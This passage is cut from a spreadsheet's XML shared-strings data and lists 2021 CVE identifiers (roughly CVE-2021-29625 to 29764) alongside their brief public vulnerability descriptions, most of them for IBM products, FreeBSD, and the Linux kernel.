    <t>fastify-csrf is an open-source plugin helps developers protect their Fastify server against CSRF attacks. Versions of fastify-csrf prior to 3.1.0 have a "double submit" mechanism using cookies with an application deployed across multiple subdomains, e.g. "heroku"-style platform as a service. Version 3.1.0 of the fastify-csrf fixes it. the vulnerability. The user of the module would need to supply a `userInfo` when generating the CSRF token to fully implement the protection on their end. This is needed only for applications hosted on different subdomains.</t>
  </si>
  <si>
    <t>CVE-2021-29625</t>
  </si>
  <si>
    <t>Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).</t>
  </si>
  <si>
    <t>CVE-2021-29626</t>
  </si>
  <si>
    <t>In FreeBSD 13.0-STABLE before n245117, 12.2-STABLE before r369551, 11.4-STABLE before r369559, 13.0-RC5 before p1, 12.2-RELEASE before p6, and 11.4-RELEASE before p9, copy-on-write logic failed to invalidate shared memory page mappings between multiple processes allowing an unprivileged process to maintain a mapping after it is freed, allowing the process to read private data belonging to other processes or the kernel.</t>
  </si>
  <si>
    <t>CVE-2021-29627</t>
  </si>
  <si>
    <t>In FreeBSD 13.0-STABLE before n245050, 12.2-STABLE before r369525, 13.0-RC4 before p0, and 12.2-RELEASE before p6, listening socket accept filters implementing the accf_create callback incorrectly freed a process supplied argument string. Additional operations on the socket can lead to a double free or use after free.</t>
  </si>
  <si>
    <t>CVE-2021-29628</t>
  </si>
  <si>
    <t>In FreeBSD 13.0-STABLE before n245764-876ffe28796c, 12.2-STABLE before r369857, 13.0-RELEASE before p1, and 12.2-RELEASE before p7, a system call triggering a fault could cause SMAP protections to be disabled for the duration of the system call. This weakness could be combined with other kernel bugs to craft an exploit.</t>
  </si>
  <si>
    <t>CVE-2021-29629</t>
  </si>
  <si>
    <t>In FreeBSD 13.0-STABLE before n245765-bec0d2c9c841, 12.2-STABLE before r369859, 11.4-STABLE before r369866, 13.0-RELEASE before p1, 12.2-RELEASE before p7, and 11.4-RELEASE before p10, missing message validation in libradius(3) could allow malicious clients or servers to trigger denial of service in vulnerable servers or clients respectively.</t>
  </si>
  <si>
    <t>CVE-2021-29630</t>
  </si>
  <si>
    <t>In FreeBSD 13.0-STABLE before n246938-0729ba2f49c9, 12.2-STABLE before r370383, 11.4-STABLE before r370381, 13.0-RELEASE before p4, 12.2-RELEASE before p10, and 11.4-RELEASE before p13, the ggatec daemon does not validate the size of a response before writing it to a fixed-sized buffer allowing a malicious attacker in a privileged network position to overwrite the stack of ggatec and potentially execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-29631</t>
  </si>
  <si>
    <t>In FreeBSD 13.0-STABLE before n246941-20f96f215562, 12.2-STABLE before r370400, 11.4-STABLE before r370399, 13.0-RELEASE before p4, 12.2-RELEASE before p10, and 11.4-RELEASE before p13, certain VirtIO-based device models in bhyve failed to handle errors when fetching I/O descriptors. A malicious guest may cause the device model to operate on uninitialized I/O vectors leading to memory corruption, crashing of the bhyve process, and possibly arbitrary code execution in the bhyve process.</t>
  </si>
  <si>
    <t>CVE-2021-29632</t>
  </si>
  <si>
    <t>In FreeBSD 13.0-STABLE before n247428-9352de39c3dc, 12.2-STABLE before r370674, 13.0-RELEASE before p6, and 12.2-RELEASE before p12, certain conditions involving use of the highlight buffer while text is scrolling on the console, console data may overwrite data structures associated with the system console or other kernel memory.</t>
  </si>
  <si>
    <t>CVE-2021-29641</t>
  </si>
  <si>
    <t>Directus 8 before 8.8.2 allows remote authenticated users to execute arbitrary code because file-upload permissions include the ability to upload a .php file to the main upload directory and/or upload a .php file and a .htaccess file to a subdirectory. Exploitation succeeds only for certain installations with the Apache HTTP Server and the local-storage driver (e.g., when the product was obtained from hub.docker.com).</t>
  </si>
  <si>
    <t>CVE-2021-29642</t>
  </si>
  <si>
    <t>GistPad before 0.2.7 allows a crafted workspace folder to change the URL for the Gist API, which leads to leakage of GitHub access tokens.</t>
  </si>
  <si>
    <t>CVE-2021-29643</t>
  </si>
  <si>
    <t>PRTG Network Monitor before 21.3.69.1333 allows stored XSS via an unsanitized string imported from a User Object in a connected Active Directory instance.</t>
  </si>
  <si>
    <t>CVE-2021-29644</t>
  </si>
  <si>
    <t>Hitachi JP1/IT Desktop Management 2 Agent 9 through 12 contains a remote code execution vulnerability because of an Integer Overflow. An attacker with network access to port 31016 may exploit this issue to execute code with unrestricted privileges on the underlying OS.</t>
  </si>
  <si>
    <t>CVE-2021-29645</t>
  </si>
  <si>
    <t>Hitachi JP1/IT Desktop Management 2 Agent 9 through 12 calls the SendMessageTimeoutW API with arbitrary arguments via a local pipe, leading to a local privilege escalation vulnerability. An attacker who exploits this issue could execute arbitrary code on the local system.</t>
  </si>
  <si>
    <t>CVE-2021-29646</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.11.11. tipc_nl_retrieve_key in net/tipc/node.c does not properly validate certain data sizes, aka CID-0217ed2848e8.</t>
  </si>
  <si>
    <t>CVE-2021-29647</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.11.11. qrtr_recvmsg in net/qrtr/qrtr.c allows attackers to obtain sensitive information from kernel memory because of a partially uninitialized data structure, aka CID-50535249f624.</t>
  </si>
  <si>
    <t>CVE-2021-29648</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.11.11. The BPF subsystem does not properly consider that resolved_ids and resolved_sizes are intentionally uninitialized in the vmlinux BPF Type Format (BTF), which can cause a system crash upon an unexpected access attempt (in map_create in kernel/bpf/syscall.c or check_btf_info in kernel/bpf/verifier.c), aka CID-350a5c4dd245.</t>
  </si>
  <si>
    <t>CVE-2021-29649</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.11.11. The user mode driver (UMD) has a copy_process() memory leak, related to a lack of cleanup steps in kernel/usermode_driver.c and kernel/bpf/preload/bpf_preload_kern.c, aka CID-f60a85cad677.</t>
  </si>
  <si>
    <t>CVE-2021-29650</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.11.11. The netfilter subsystem allows attackers to cause a denial of service (panic) because net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h lack a full memory barrier upon the assignment of a new table value, aka CID-175e476b8cdf.</t>
  </si>
  <si>
    <t>CVE-2021-29651</t>
  </si>
  <si>
    <t>Pomerium before 0.13.4 has an Open Redirect (issue 1 of 2).</t>
  </si>
  <si>
    <t>CVE-2021-29652</t>
  </si>
  <si>
    <t>Pomerium from version 0.10.0-0.13.3 has an Open Redirect in the user sign-in/out process</t>
  </si>
  <si>
    <t>CVE-2021-29653</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise 1.5.1 and newer, under certain circumstances, may exclude revoked but unexpired certificates from the CRL. Fixed in 1.5.8, 1.6.4, and 1.7.1.</t>
  </si>
  <si>
    <t>CVE-2021-29654</t>
  </si>
  <si>
    <t>AjaxSearchPro before 4.20.8 allows Deserialization of Untrusted Data (in the import database feature of the administration panel), leading to Remote Code execution.</t>
  </si>
  <si>
    <t>CVE-2021-29655</t>
  </si>
  <si>
    <t>Pexip Infinity Connect before 1.8.0 omits certain provisioning authenticity checks. Thus, untrusted code may execute.</t>
  </si>
  <si>
    <t>CVE-2021-29656</t>
  </si>
  <si>
    <t>Pexip Infinity Connect before 1.8.0 mishandles TLS certificate validation. The allow list is not properly checked.</t>
  </si>
  <si>
    <t>CVE-2021-29657</t>
  </si>
  <si>
    <t>arch/x86/kvm/svm/nested.c in the Linux kernel before 5.11.12 has a use-after-free in which an AMD KVM guest can bypass access control on host OS MSRs when there are nested guests, aka CID-a58d9166a756. This occurs because of a TOCTOU race condition associated with a VMCB12 double fetch in nested_svm_vmrun.</t>
  </si>
  <si>
    <t>CVE-2021-29658</t>
  </si>
  <si>
    <t>The unofficial vscode-rufo extension before 0.0.4 for Visual Studio Code allows attackers to execute arbitrary binaries if the user opens a crafted workspace folder.</t>
  </si>
  <si>
    <t>CVE-2021-29659</t>
  </si>
  <si>
    <t>ownCloud 10.7 has an incorrect access control vulnerability, leading to remote information disclosure. Due to a bug in the related API endpoint, the attacker can enumerate all users in a single request by entering three whitespaces. Secondary, the retrieval of all users on a large instance could cause higher than average load on the instance.</t>
  </si>
  <si>
    <t>CVE-2021-29660</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) vulnerability in en/cfg_setpwd.html in Softing AG OPC Toolbox through 4.10.1.13035 allows attackers to reset the administrative password by inducing the Administrator user to browse a URL controlled by an attacker.</t>
  </si>
  <si>
    <t>CVE-2021-29661</t>
  </si>
  <si>
    <t>Softing AG OPC Toolbox through 4.10.1.13035 allows /en/diag_values.html Stored XSS via the ITEMLISTVALUES##ITEMID parameter, resulting in JavaScript payload injection into the trace file. This payload will then be triggered every time an authenticated user browses the page containing it.</t>
  </si>
  <si>
    <t>CVE-2021-29662</t>
  </si>
  <si>
    <t>The Data::Validate::IP module through 0.29 for Perl does not properly consider extraneous zero characters at the beginning of an IP address string, which (in some situations) allows attackers to bypass access control that is based on IP addresses.</t>
  </si>
  <si>
    <t>CVE-2021-29663</t>
  </si>
  <si>
    <t>CourseMS (aka Course Registration Management System) 2.1 is affected by cross-site scripting (XSS). When an attacker with access to an Admin account creates a Job Title in the Site area (aka the admin/add_jobs.php name parameter), they can insert an XSS payload. This payload will execute whenever anyone visits the registration page.</t>
  </si>
  <si>
    <t>CVE-2021-29665</t>
  </si>
  <si>
    <t>IBM Security Verify Access 20.07 is vulnerable to a stack based buffer overflow, caused by improper bounds checking which could allow a local attacker to execute arbitrary code on the system with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2021-29666</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.6 and 5.1.0 through 5.1.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 199400.</t>
  </si>
  <si>
    <t>CVE-2021-29667</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.6 and 5.1.0 through 5.1.0.2 is potentially vulnerable to CSV Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 199403.</t>
  </si>
  <si>
    <t>CVE-2021-29668</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 199406.</t>
  </si>
  <si>
    <t>CVE-2021-29670</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 199408.</t>
  </si>
  <si>
    <t>CVE-2021-29671</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.1.0.1 could allow a local attacker to bypass the filesystem audit logging mechanism when file audit logging is enabled. IBM X-Force ID: 199478.</t>
  </si>
  <si>
    <t>CVE-2021-29672</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Client 8.1.0.0-8 through 1.11.0 is vulnerable to a stack-based buffer overflow, caused by improper bounds checking when processing the current locale settings. A local attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges or cause the application to crash. IBM X-Force ID: 199479</t>
  </si>
  <si>
    <t>CVE-2021-29673</t>
  </si>
  <si>
    <t>IBM Jazz Team Server products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 199482.</t>
  </si>
  <si>
    <t>CVE-2021-29676</t>
  </si>
  <si>
    <t>IBM Security Verify (IBM Security Verify Privilege Vault 10.9.66) is vulnerable to link injection. By persuading a victim to click on a specially-crafted URL link, a remote attacker could exploit this vulnerability to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking</t>
  </si>
  <si>
    <t>CVE-2021-29677</t>
  </si>
  <si>
    <t>IBM Security Verify (IBM Security Verify Privilege Vault 10.9.66) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2021-29678</t>
  </si>
  <si>
    <t>IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow a user with DBADM authority to access other databases and read or modify files. IBM X-Force ID: 199914.</t>
  </si>
  <si>
    <t>CVE-2021-29679</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7 and 11.2.0 could allow an authenticated user to execute code remotely due to incorrectly neutralizaing user-contrlled input that could be interpreted a a server-side include (SSI) directive. IBM X-Force ID: 199915.</t>
  </si>
  <si>
    <t>CVE-2021-29681</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 could allow an attacker to obtain sensitive information by injecting parameters into an HTML query. This information could be used in further attacks against the system. IBM X-Force ID: 199918.</t>
  </si>
  <si>
    <t>CVE-2021-29682</t>
  </si>
  <si>
    <t>IBM Security Identity Manager 7.0.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 199997</t>
  </si>
  <si>
    <t>CVE-2021-29683</t>
  </si>
  <si>
    <t>IBM Security Identity Manager 7.0.2 stores user credentials in plain clear text which can be read by an authenticated user. IBM X-Force ID: 199998.</t>
  </si>
  <si>
    <t>CVE-2021-29686</t>
  </si>
  <si>
    <t>IBM Security Identity Manager 7.0.2 could allow an authenticated user to bypass security and perform actions that they should not have access to. IBM X-Force ID: 200015</t>
  </si>
  <si>
    <t>CVE-2021-29687</t>
  </si>
  <si>
    <t>IBM Security Identity Manager 7.0.2 could allow a remote user to enumerate usernames due to a difference of responses from valid and invalid login attempts. IBM X-Force ID: 200018</t>
  </si>
  <si>
    <t>CVE-2021-29688</t>
  </si>
  <si>
    <t>IBM Security Identity Manager 7.0.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 200102.</t>
  </si>
  <si>
    <t>CVE-2021-29691</t>
  </si>
  <si>
    <t>IBM Security Identity Manager 7.0.2 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 200252.</t>
  </si>
  <si>
    <t>CVE-2021-29692</t>
  </si>
  <si>
    <t>IBM Security Identity Manager 7.0.2 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 200253.</t>
  </si>
  <si>
    <t>CVE-2021-29693</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user that is in the with elevated group privileges to cause a denial of service due to a vulnerability in the lpd daemon. IBM X-Force ID: 200255.</t>
  </si>
  <si>
    <t>CVE-2021-29694</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.7 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 200258.</t>
  </si>
  <si>
    <t>CVE-2021-29695</t>
  </si>
  <si>
    <t>IBM Host firmware for LC-class Systems could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request that would allow them to delete arbitrary files on the system. IBM X-Force ID: 200558.</t>
  </si>
  <si>
    <t>CVE-2021-29696</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.5.0.0, 1.5.1.0, 1.6.0.0, 1.6.1.0, 1.7.0.0, and 1.7.1.0 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request.</t>
  </si>
  <si>
    <t>CVE-2021-29697</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.5.0.0, 1.5.1.0, 1.6.0.0, 1.6.1.0, 1.7.0.0, and 1.7.1.0 could allow a remote authenticated attacker to obtain sensitive information through HTTP requests that could be used in further attacks against the system.</t>
  </si>
  <si>
    <t>CVE-2021-29699</t>
  </si>
  <si>
    <t>IBM Security Verify Access Docker 10.0.0 could allow a remote priviled user to upload arbitrary files with a dangerous file type that could be excuted by an user. IBM X-Force ID: 200600.</t>
  </si>
  <si>
    <t>CVE-2021-29700</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authneticated attacker to obtain sensitive information from configuration files that could aid in further attacks against the system. IBM X-Force ID: 200656.</t>
  </si>
  <si>
    <t>CVE-2021-29701</t>
  </si>
  <si>
    <t>IBM Engineering Workflow Management 7.0, 7.0.1, and 7.0.2 as well as IBM Rational Team Concert 6.0.6 and 6.0.6.1 could allow an authneticated attacker to obtain sensitive information from build definitions that could aid in further attacks against the system. IBM X-Force ID: 200657.</t>
  </si>
  <si>
    <t>CVE-2021-29702</t>
  </si>
  <si>
    <t>Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1.4 and 11.5.5 is vulnerable to a denial of service as the server terminates abnormally when executing a specially crafted SELECT statement. IBM X-Force ID: 200658.</t>
  </si>
  <si>
    <t>CVE-2021-29703</t>
  </si>
  <si>
    <t>Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to a denial of service as the server terminates abnormally when executing a specially crafted SELECT statement. IBM X-Force ID: 200659.</t>
  </si>
  <si>
    <t>CVE-2021-29704</t>
  </si>
  <si>
    <t>IBM Security SOAR uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-29706</t>
  </si>
  <si>
    <t>IBM AIX 7.1 could allow a non-privileged local user to exploit a vulnerability in the trace facility to expose sensitive information or cause a denial of service. IBM X-Force ID: 200663.</t>
  </si>
  <si>
    <t>CVE-2021-29707</t>
  </si>
  <si>
    <t>IBM HMC (Hardware Management Console) V9.1.910.0 and V9.2.950.0 could allow a local user to escalate their privileges to root access on a restricted shell. IBM X-Force ID: 200879.</t>
  </si>
  <si>
    <t>CVE-2021-29708</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.1.0.1 could allow a local with access to the GUI pod container to obtain sensitive cryptographic keys that could allow them to elevate their privileges. IBM X-Force ID: 200883.</t>
  </si>
  <si>
    <t>CVE-2021-29711</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 6.2.7.8 , 6.2.7.9, 7.0.3.0, 7.0.4.0, 7.0.5.4, 7.1.0.0, 7.1.1.0, 7.1.1.1, and 7.1.1.2 could allow an authenticated user with certain permissions to initiate an agent upgrade through the CLI interface. IBM X-Force ID: 200965.</t>
  </si>
  <si>
    <t>CVE-2021-29712</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 200966.</t>
  </si>
  <si>
    <t>CVE-2021-29713</t>
  </si>
  <si>
    <t>IBM Jazz Team Server products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2021-29714</t>
  </si>
  <si>
    <t>IBM Content Navigator 3.0.CD could allow a malicious user to cause a denial of service due to improper input validation. IBM X-Force ID: 200968.</t>
  </si>
  <si>
    <t>CVE-2021-29715</t>
  </si>
  <si>
    <t>IBM API Connect 5.0.0.0 through 5.0.8.11 could alllow a remote user to obtain sensitive information or conduct denial of serivce attacks due to open ports. IBM X-Force ID: 201018.</t>
  </si>
  <si>
    <t>CVE-2021-29716</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7 and 11.2.0 could allow a low level user to reas of the application that privileged user should only be allowed to view. IBM X-Force ID: 201087.</t>
  </si>
  <si>
    <t>CVE-2021-29719</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7 and 11.2.0 could be vulnerable to client side vulnerabilties due to a web response specifying an incorrect content type. IBM X-Force ID: 201091</t>
  </si>
  <si>
    <t>CVE-2021-29722</t>
  </si>
  <si>
    <t>IBM Sterling Secure Proxy 6.0.1, 6.0.2, 2.4.3.2, and 3.4.3.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 201095.</t>
  </si>
  <si>
    <t>CVE-2021-29723</t>
  </si>
  <si>
    <t>IBM Sterling Secure Proxy 6.0.1, 6.0.2, 2.4.3.2, and 3.4.3.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-ForceID: 201100.</t>
  </si>
  <si>
    <t>CVE-2021-29725</t>
  </si>
  <si>
    <t>IBM Secure External Authentication Server 2.4.3.2, 6.0.1, 6.0.2 and IBM Secure Proxy 3.4.3.2, 6.0.1, 6.0.2 could allow a remote user to consume resources causing a denial of service due to a resource leak.</t>
  </si>
  <si>
    <t>CVE-2021-29726</t>
  </si>
  <si>
    <t>IBM Sterling Secure Proxy 6.0.3 and IBM Secure External Authentication Server 6.0.3 does not properly ensure that a certificate is actually associated with the host due to improper validation of certificates. IBM X-Force ID: 201104.</t>
  </si>
  <si>
    <t>CVE-2021-29727</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 201106.</t>
  </si>
  <si>
    <t>CVE-2021-29728</t>
  </si>
  <si>
    <t>IBM Sterling Secure Proxy 6.0.1, 6.0.2, 2.4.3.2, and 3.4.3.2 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 201160.</t>
  </si>
  <si>
    <t>CVE-2021-29730</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 201164.</t>
  </si>
  <si>
    <t>CVE-2021-29735</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.5, 10.6, 11.0, 11.1, 11.2, and 11.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2021-29736</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a remote user to gain elevated privileges on the system. IBM X-Force ID: 201300.</t>
  </si>
  <si>
    <t>CVE-2021-29737</t>
  </si>
  <si>
    <t>IBM InfoSphere Data Flow Designer Engine (IBM InfoSphere Information Server 11.7 ) component has improper validation of the REST API server certificate. IBM X-Force ID: 201301.</t>
  </si>
  <si>
    <t>CVE-2021-29738</t>
  </si>
  <si>
    <t>IBM InfoSphere Data Flow Designer (IBM InfoSphere Information Server 11.7 ) is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 201302.</t>
  </si>
  <si>
    <t>CVE-2021-29739</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0 could allow a remote attacker to obtain sensitive information when a stack trace is returned in the browser. X-Force ID: 198846.</t>
  </si>
  <si>
    <t>CVE-2021-29740</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.6 and 5.1.0 through 5.1.0.3 system core component is affected by a format string security vulnerability. An attacker could execute arbitrary code in the context of process memory, potentially escalating their system privileges and taking control over the entire system with root access. IBM X-Force ID: 201474.</t>
  </si>
  <si>
    <t>CVE-2021-29741</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user to exploit a vulnerability in Korn Shell (ksh) to gain root privileges. IBM X-Force ID: 201478.</t>
  </si>
  <si>
    <t>CVE-2021-29742</t>
  </si>
  <si>
    <t>IBM Security Verify Access Docker 10.0.0 could allow a user to impersonate another user on the system. IBM X-Force ID: 201483.</t>
  </si>
  <si>
    <t>CVE-2021-29743</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.0 and 7.6.1 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 201693.</t>
  </si>
  <si>
    <t>CVE-2021-29744</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.0 and 7.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 201694.</t>
  </si>
  <si>
    <t>CVE-2021-29745</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7 and 11.2.0 is vulnerable to priviledge escalation where a lower evel user could have access to the 'New Job' page to which they should not have access to. IBM X-Force ID: 201695.</t>
  </si>
  <si>
    <t>CVE-2021-29747</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 could allow a remote attacker to obtain highly sensitive information due to a vulnerability in the authentication mechanism. IBM X-Force ID: 201775.</t>
  </si>
  <si>
    <t>CVE-2021-29749</t>
  </si>
  <si>
    <t>IBM Secure External Authentication Server 6.0.2 and IBM Secure Proxy 6.0.2 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 201777.</t>
  </si>
  <si>
    <t>CVE-2021-29750</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 201778.</t>
  </si>
  <si>
    <t>CVE-2021-29751</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18.0, 19.0, and 20.0 and IBM Business Process Manager 8.5 and 8.6 could allow an authenticated user to obtain sensitive information about another user under nondefault configurations. IBM X-Force ID: 201779.</t>
  </si>
  <si>
    <t>CVE-2021-29752</t>
  </si>
  <si>
    <t>IBM Db2 11.2 and 11.5 contains an information disclosure vulnerability, exposing remote storage credentials to privileged users under specific conditions. IBM X-Fporce ID: 201780.</t>
  </si>
  <si>
    <t>CVE-2021-29753</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18. 19, 20, 21, and IBM Business Process Manager 8.5 and d8.6 transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.</t>
  </si>
  <si>
    <t>CVE-2021-29754</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to a privilege escalation vulnerability when using the SAML Web Inbound Trust Association Interceptor (TAI). IBM X-Force ID: 202006.</t>
  </si>
  <si>
    <t>CVE-2021-29755</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3, 7.4, and 7.5 does not preform proper certificate validation for some inter-host communications. IBM X-Force ID: 202015.</t>
  </si>
  <si>
    <t>CVE-2021-29756</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7 and 11.2.0 is vulnerable to cross-site request forgery (CSRF) in the My Inbox page which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 202167.</t>
  </si>
  <si>
    <t>CVE-2021-29757</t>
  </si>
  <si>
    <t>IBM QRadar User Behavior Analytics 4.1.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 202168.</t>
  </si>
  <si>
    <t>CVE-2021-29758</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated user to perform actions that they should not be able to access due to improper access controls. IBM X-Force ID: 202169.</t>
  </si>
  <si>
    <t>CVE-2021-29759</t>
  </si>
  <si>
    <t>IBM App Connect Enterprise Certified Container 1.0, 1.1, 1.2, and 1.3 could allow a privileged user to obtain sensitive information from internal log files. IBM X-Force ID: 202212.</t>
  </si>
  <si>
    <t>CVE-2021-29760</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated user to download unauthorized files through the dashboard user interface. IBM X-Force ID: 202213.</t>
  </si>
  <si>
    <t>CVE-2021-29761</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated user to obtain sensitive information from the dashboard that they should not have access to. IBM X-Force ID: 202265.</t>
  </si>
  <si>
    <t>CVE-2021-29763</t>
  </si>
  <si>
    <t>IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 under very specific conditions, could allow a local user to keep running a procedure that could cause the system to run out of memory.and cause a denial of service. IBM X-Force ID: 202267.</t>
  </si>
  <si>
    <t>CVE-2021-29764</t>
  </si>
  <si>
